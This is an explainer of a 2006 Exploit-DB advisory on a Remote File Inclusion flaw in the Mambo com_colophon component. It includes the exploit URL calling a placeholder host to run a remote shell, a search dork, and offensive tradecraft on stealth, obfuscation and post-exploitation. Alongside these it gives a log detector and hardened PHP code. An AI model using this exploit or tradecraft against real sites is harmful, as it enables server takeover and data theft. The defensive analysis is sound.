Mambo Component 'com_colophon' 1.2 RFI Exploit Explained

What this paper is
This paper describes a Remote File Inclusion (RFI) vulnerability in the Mambo CMS (Content Management System) component com_colophon, version 1.2 and earlier. It details how an unauthenticated attacker can make the web server fetch and execute attacker-supplied PHP, and through it run arbitrary commands on the host.
Simple technical breakdown
The vulnerable line in admin.colophon.php builds an include path from two variables the script never initialises itself: $mosConfig_absolute_path (the install directory, normally set by Mambo's configuration.php) and $mosConfig_lang (the language code). Because the script lacks the defined('_VALID_MOS') guard that the advisory recommends adding, it can be requested directly rather than through Mambo's front controller, and with PHP's register_globals enabled a GET parameter of the same name populates either variable. The published exploit sets $mosConfig_absolute_path to a URL on an attacker-controlled host, so require_once fetches and executes the attacker's PHP file instead of a local language file.
Complete code and payload walkthrough
The advisory is concise: it names the script, quotes the vulnerable line, and gives the exploit URL. No shell code or payload file is included in the raw text, only the URL structure.
Vulnerable Code Snippet:
require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");
- Purpose: This line includes a language file selected by the value of $mosConfig_lang.
- Inputs: $mosConfig_absolute_path (expected to be the Mambo installation path) and $mosConfig_lang (expected to be a language code such as 'en' or 'it'). Neither is validated, and when the script is requested directly neither has been set by Mambo, so with register_globals both can be supplied as GET parameters.
- Behavior: It concatenates a full path to a language file. If the file does not exist, require_once raises a fatal error and the script stops (unlike include, which only warns). If the attacker-controlled path begins with http://, PHP's URL wrappers fetch the file over the network and execute it. On PHP 5.2 and later this requires allow_url_include = On; on the PHP 4.x and 5.0/5.1 releases current in 2006 allow_url_fopen alone governed remote includes.
- Output: If successful, the code from the included file runs on the victim server with the web server's privileges.
Exploit URL Structure:
http://www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
- Purpose: This URL demonstrates how to trigger the RFI vulnerability.
- Breakdown:
  - http://www.site.it/administrator/components/com_colophon/admin.colophon.php: the vulnerable script on the victim's website, requested directly rather than through Mambo's index.php.
  - ?mosConfig_absolute_path=: the GET parameter that, through register_globals, becomes the $mosConfig_absolute_path variable inside the script.
  - http://evalsite/shell.php?: the attacker-controlled URL. The attacker hosts shell.php on evalsite; its content is the PHP the victim server will execute. The trailing ? matters: the script appends /components/com_colophon/language/$mosConfig_lang.php to whatever it receives, and the ? turns that suffix into a query string, so the victim requests http://evalsite/shell.php?/components/com_colophon/language/.php (with $mosConfig_lang empty unless the attacker also supplies it) and the attacker's web server still serves shell.php. Without the ? the suffix would become part of the path and the request would typically return 404.
Mapping:
- require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php"); -> Vulnerable Inclusion Logic
- mosConfig_absolute_path=http://evalsite/shell.php? -> RFI Payload Injection Point
Shellcode/Payload: No shellcode is provided in the raw text. The "payload" is the URL itself, which makes the vulnerable server fetch and execute a remote PHP script. The content of shell.php is the actual command-execution payload, anything from a one-line backdoor to a full web shell.
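To make the trailing ? concrete, here is an added example in PHP (not from the advisory or from Mambo) that rebuilds the include argument exactly as the vulnerable line concatenates it and asks PHP's own parse_url() how a URL wrapper would split it. evalsite and shell.php are the advisory's placeholders; the install path /var/www/mambo and the language code en are assumptions.

```php
<?php
// Added example, not from the advisory or Mambo. Rebuilds the string the
// vulnerable require_once() receives and shows how PHP's URL wrapper would
// split it. "evalsite" and "shell.php" are the advisory's placeholders; the
// install path '/var/www/mambo' and the language code 'en' are assumptions.

// The concatenation exactly as the vulnerable line performs it.
function buildIncludePath(string $absolutePath, string $lang): string
{
    return "$absolutePath/components/com_colophon/language/$lang.php";
}

// True when the include target starts with a scheme PHP's URL wrappers handle,
// i.e. when allow_url_include / allow_url_fopen decide whether it is fetched.
function isRemoteInclude(string $includePath): bool
{
    return (bool) preg_match('#^(?:https?|ftp)://#i', $includePath);
}

// How the victim's PHP would split a remote target into host, path and query.
function describeRemoteFetch(string $includePath): array
{
    $u = parse_url($includePath);
    return [
        'host'  => $u['host']  ?? '',
        'path'  => $u['path']  ?? '',
        'query' => $u['query'] ?? '',
    ];
}

$cases = [
    'legitimate'          => buildIncludePath('/var/www/mambo', 'en'),
    'advisory payload'    => buildIncludePath('http://evalsite/shell.php?', ''), // $mosConfig_lang unset
    'payload without "?"' => buildIncludePath('http://evalsite/shell.php', ''),
];

foreach ($cases as $label => $target) {
    echo $label, ":\n  include target = ", $target, "\n";
    if (isRemoteInclude($target)) {
        $f = describeRemoteFetch($target);
        echo "  remote fetch   = host {$f['host']} path {$f['path']} query {$f['query']}\n";
    } else {
        echo "  local include\n";
    }
}
```

For the advisory payload, parse_url() stops the path at the first ?, so the host is evalsite, the path is /shell.php and the appended /components/com_colophon/language/.php lands in the query, which a static web server ignores. Drop the ? and the same suffix becomes part of the path, so the victim asks for /shell.php/components/com_colophon/language/.php and only a server that rewrites or uses PATH_INFO will still return shell.php.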
Practical details for offensive operations teams
- Required Access Level: Network access to the vulnerable admin.colophon.php is all that is needed. No Mambo account is required: although the script sits under /administrator/, it lacks the defined('_VALID_MOS') guard, so it runs when requested directly, outside Mambo's session and login handling.
- Lab Preconditions:
  - A Mambo installation with the com_colophon component at version 1.2 or earlier (the advisory says "=<1.2"), or any version whose admin.colophon.php still contains the quoted require_once line without a _VALID_MOS guard.
  - PHP with register_globals = On, so that the GET parameter populates $mosConfig_absolute_path.
  - PHP allowing remote includes: allow_url_fopen = On and, on PHP 5.2 or later, allow_url_include = On. Without these the include stays local and the RFI fails.
  - An attacker-controlled web server to host shell.php.
- Tooling Assumptions:
  - A web browser or curl to send the exploit URL.
  - A simple HTTP server (for example python -m SimpleHTTPServer, netcat, or a dedicated web server) to host the payload. It must return the PHP source as plain text: if the attacker's host itself executes PHP, shell.php runs there and only its output reaches the victim, which is why such payloads are commonly hosted with a .txt extension.
  - A text editor to create the payload file.
- Execution Pitfalls:
  - PHP Configuration: the most significant pitfall is the register_globals, allow_url_fopen and allow_url_include settings. If register_globals is off, the GET parameter never reaches the variable; if remote includes are disabled, the include is treated as a local path and the exploit fails.
  - Web Application Firewalls (WAFs): a WAF may recognise a URL scheme inside a query parameter as an RFI pattern and block the request.
  - URL Encoding: special characters in the payload URL may need encoding; the trailing ? must survive intact.
  - Input Sanitization: the exploit relies on $mosConfig_absolute_path being used verbatim in the require_once path, as the advisory shows. A component version that validates the variable or defines _VALID_MOS before the include is not exploitable this way.
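What the WAF pitfall above looks like from the defender's side, as an added example in PHP that is not part of the advisory: the check flags any request carrying a URL in a mosConfig_* parameter, the signature of this RFI, and runs over three constructed Apache combined-format log lines (the IPs, timestamps and user agents are made up for the example).

```php
<?php
// Added example, not part of the advisory: flags requests carrying a URL in a
// mosConfig_* parameter (the signature of this RFI) in Apache combined-format
// access logs. The three log lines are constructed for the example; IPs,
// timestamps and user agents are made up.

// Pulls the request target ("/path?query") out of a combined-format line.
function extractRequestTarget(string $logLine): ?string
{
    return preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"#', $logLine, $m) ? $m[1] : null;
}

// Returns [name => decoded value] for every mosConfig_* parameter whose value
// starts with a URL scheme, after percent-decoding so encoded payloads match too.
function findRemoteIncludeParams(string $target): array
{
    $qpos = strpos($target, '?');
    if ($qpos === false) {
        return [];
    }
    $hits = [];
    foreach (explode('&', substr($target, $qpos + 1)) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $value = rawurldecode($value);
        if (stripos($name, 'mosConfig_') === 0 && preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

// Constructed sample: one plain attempt, one percent-encoded attempt, one normal hit.
$sampleLog = [
    '203.0.113.7 - - [29/Jul/2006:10:14:02 +0200] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php? HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.3 - - [29/Jul/2006:10:14:09 +0200] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http%3A%2F%2Fevalsite%2Fshell.php%3F HTTP/1.1" 200 512 "-" "curl/7.15.5"',
    '192.0.2.44 - - [29/Jul/2006:10:15:00 +0200] "GET /index.php?option=com_colophon&lang=en HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

foreach ($sampleLog as $line) {
    $target = extractRequestTarget($line);
    $hits   = $target === null ? [] : findRemoteIncludeParams($target);
    printf("%-11s %s\n", $hits ? 'RFI-ATTEMPT' : 'ok', $target ?? '(unparsed)');
    foreach ($hits as $name => $value) {
        printf("            %s = %s\n", $name, $value);
    }
}
```

The query string is split on the first ? by hand rather than with parse_url(), because the payload itself contains a second ? and a :// and a lenient parser is exactly what an evasion would target. Decoding before matching is what catches the second line; a signature that only looks for the literal http:// in the raw request misses it.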
- Tradecraft Considerations:
  - Stealth: a less conspicuous hostname than evalsite and a filename other than shell.php reduce the chance of the request standing out in access logs.
  - Payload Obfuscation: if shell.php is detected, obfuscating the PHP inside it can evade basic signature-based detection.
  - Post-Exploitation: shell.php would typically establish a reverse shell, download further tools, or exfiltrate data.
Where this was used and when
- Context: The vulnerability was found in Mambo CMS, the precursor to Joomla!. The affected software is the com_colophon component at version 1.2 or earlier, not Mambo itself at version 1.2; it would have been used against sites running that component.
- Approximate Years/Dates: The exploit was published on July 29, 2006 (the original footer credits milw0rm.com). Its active exploitation period would have been 2006 and shortly thereafter; Mambo was popular in the early to mid-2000s before Joomla! became dominant.
Defensive lessons for modern teams
- Input Validation and Sanitization: validate all user-supplied input that reaches a file path, database query, or system command; never trust external input.
- Secure PHP Configuration: leave register_globals off (it was removed in PHP 5.4), and keep allow_url_include off and allow_url_fopen off unless a specific feature needs them. Remote includes are a direct path to code execution.
- Dependency Management: keep the CMS and its components updated; vulnerabilities like this are patched in later releases.
- Web Application Firewalls (WAFs): deploy and tune a WAF to block common attack patterns, including URL schemes in parameters that feed file operations.
- Least Privilege: run the web application with the minimum privileges it needs, so a shell obtained this way cannot easily move further.
- File Inclusion Best Practices: where an include is built from input, allow-list the permitted values and resolve them against a fixed directory rather than trying to block bad ones, and guard component scripts against direct access, as the advisory's own fix (defined('_VALID_MOS') or die) does.
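The vulnerable line next to a hardened replacement, as an added example in modern PHP. It is not Mambo's code; the only part taken from the advisory is the _VALID_MOS guard it recommends. The install path, the language list and the lang request parameter are assumptions for illustration.

```php
<?php
// Added example (modern PHP), not Mambo's code: the include as the advisory
// quotes it, next to a hardened version. The install path, language list and
// the 'lang' request parameter below are assumptions.

// The guard the advisory recommends adding at the top of admin.colophon.php.
// Mambo's front controller defines _VALID_MOS; a direct request does not,
// so the script stops before anything from the request is used.
defined('_VALID_MOS') or die('Direct access not allowed.');

// Vulnerable pattern, kept as described: when the file is requested directly
// neither variable has been set by Mambo, and register_globals lets a GET
// parameter of the same name supply it, URL included.
function vulnerableLanguagePath(): string
{
    global $mosConfig_absolute_path, $mosConfig_lang;
    return "$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php";
}

// Hardened: fixed base directory, strict format check plus allow-list for the
// language code, and a realpath() containment check on the resolved file.
const COLOPHON_LANG_DIR = '/var/www/mambo/components/com_colophon/language'; // assumed install path
const COLOPHON_LANGS    = ['en', 'it', 'de'];                                // assumed shipped languages

function safeLanguagePath(string $lang): ?string
{
    if (!preg_match('/^[a-z]{2}(?:_[A-Z]{2})?$/', $lang)
        || !in_array($lang, COLOPHON_LANGS, true)) {
        return null;                              // not a known language code
    }
    $dir  = realpath(COLOPHON_LANG_DIR);
    $real = realpath(COLOPHON_LANG_DIR . '/' . $lang . '.php');
    if ($dir === false || $real === false || strpos($real, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;                              // file missing or outside the directory
    }
    return $real;                                 // always a local file, never a URL
}

// Read the language explicitly instead of relying on register_globals;
// anything rejected falls back to the default language.
$requested = isset($_GET['lang']) ? (string) $_GET['lang'] : 'en';
$path = safeLanguagePath($requested) ?? safeLanguagePath('en');
if ($path !== null) {
    require_once $path;
}
```

Dropped into a component file, the guard fires on any direct request, which is the whole attack path here; the rest defends in depth in case the guard is ever removed. The base directory is a constant rather than a variable, so no request can turn it into a URL, and the allow-list plus realpath() check mean that even a language code that passes the regex cannot select a file outside the language directory.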
ASCII visual
 +-------------------+   (1) GET admin.colophon.php?mosConfig_absolute_path=   +---------------------------+
 | Attacker          |       http://evalsite/shell.php?                        | Victim's Web Server (PHP) |
 | (browser / curl)  | ------------------------------------------------------> | (Mambo + com_colophon)    |
 +-------------------+                                                         | admin.colophon.php:       |
                                                                               |  require_once(            |
 +-------------------+   (2) GET /shell.php?/components/com_colophon/...       |   "$mosConfig_absolute_   |
 | Attacker's Server | <------------------------------------------------------ |    path/components/...")  |
 | (evalsite)        |                                                         |                           |
 | - hosts shell.php | ------------------------------------------------------> | (3) shell.php source is   |
 +-------------------+   returns PHP source (must not be executed on evalsite) |     executed here         |
                                                                               +---------------------------+
Source references
- Paper ID: 2085
- Paper Title: Mambo Component 'com_colophon' 1.2 - Remote File Inclusion
- Author: Drago84
- Published: 2006-07-29
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2085
- Raw URL: https://www.exploit-db.com/raw/2085
Original Exploit-DB Content (Verbatim)
########### Command Mambo Colophon =<1.2 ##by #Drago84#########
Found By Drago84
Exclusive Security Italian Security
This bug allows a remote atacker to execute commands via rfi
page:
admin.colophon.php
bug:
require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");
path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );
dork: inurl:com_colophon
expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
# milw0rm.com [2006-07-29]